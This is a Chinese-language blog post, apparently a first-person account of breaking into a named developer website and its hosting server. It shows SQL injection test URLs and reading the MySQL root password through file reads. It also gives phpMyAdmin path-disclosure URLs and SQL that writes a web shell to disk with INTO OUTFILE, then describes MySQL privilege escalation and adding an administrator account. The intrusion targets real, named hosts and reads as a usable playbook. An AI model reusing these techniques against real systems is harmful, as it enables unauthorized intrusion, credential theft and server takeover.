前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的.一看,真不愧是落伍的產品,風格依然落伍,功能還行,大體一看沒什么漏洞.看看服務器吧.ping demo.im286.com返回IP 58.253.71.241打開是個"Directory Listing Denied",沒意思.不喜歡.再看看開發(fā)者的
前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的.一看,真不愧是落伍的產品,風格依然落伍,功能還行,大體一看沒什么漏洞.看看服務器吧.ping demo.im286.com返回IP 58.253.71.241打開是個"Directory Listing Denied",沒意思.不喜歡.
再看看開發(fā)者的站,www.php.com.cn,域名真不錯,ping一下吧.返回Pinging phper.xihuidc.com.cn [58.253.71.241],看出門道來了,CNAME啊.而且一看域名xihuidc,這個IDC有點2.CNAME的確便于管理,但是這樣不太好.
ping的同時我也打開了php.com.cn的站點,喲,"Powered by ebcms",先來檢測下注入吧.
http://www.php.com.cn/?do=index&cid=3'
http://www.php.com.cn/?do=news&id=4'
這兩個豬點不僅出錯了,而且返回了物理地址.D:\public_html\php.com.cn\wwwroot\libraries\syslib\drivers\driver.mysql.php(這個地址很重要哦)
本來想,有豬點,射管理員密碼出來,進后臺不就得了嗎,讀出密碼一看,傻眼了.crypt加密的,DZ那邊的數(shù)據(jù)也讀出來了.魚也夠BT的,密碼暴不出來,而且只登錄過一次...(這個也很重要,細節(jié).)
因為在檢測的時候發(fā)現(xiàn)是mysql的root,直接找工具pangolin,讀文件吧,怎么讀文件也是很有技巧的,這里不多說,讀到setting.php,終于讀到root的密碼了.
500)this.width=500" title="點擊這里用新窗口瀏覽圖片" />
現(xiàn)在就開始猜phpmyadmin的路徑了,這個倒是很順利.
http://phper.xihuidc.com.cn/phpmyadmin/,然后就很簡單了.暴路徑,暴路徑我給大家?guī)讉辦法:
引用
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
路徑出來了.E:\phpMyadmin\phpmyadmin\libraries\select_lang.lib.php
500)this.width=500" title="點擊這里用新窗口瀏覽圖片" />
寫個shell進去.
Create TABLE tmdsb(shell text NOT NULL);
Insert INTO tmdsb (shell) VALUES('test');
select shell from tmdsb into outfile 'E:\phpMyadmin\phpmyadmin\libraries\php.php';
Drop TABLE tmdsb;
有個小馬就好辦了,再傳個大馬進去.發(fā)現(xiàn)每個磁盤根目錄都不能瀏覽,甚至跳到D:\public_html\php.com.cn\wwwroot\這里也跳不過去,只能在phpmyadmin的目錄溜達,這里表揚下IDC,做的不錯.看看C:\Progra~1,沒有SERV-U,不能用Serv-U提權了,上傳一個su.php,由于MYSQL是以系統(tǒng)權限安裝的,(在WINDOWS服務管理里面可以看到,是以服務加載的)所以,這里我考慮用MYSQL提權,如圖:
(這個shell里的我給拼錯了,select和cmdshell,直接導致我以為服務器net.exe做了限制...其實沒有...)
500)this.width=500" title="點擊這里用新窗口瀏覽圖片" />
500)this.width=500" title="點擊這里用新窗口瀏覽圖片" />
修改用戶k666.com的密碼,并添加到管理員組,成功登陸服務器.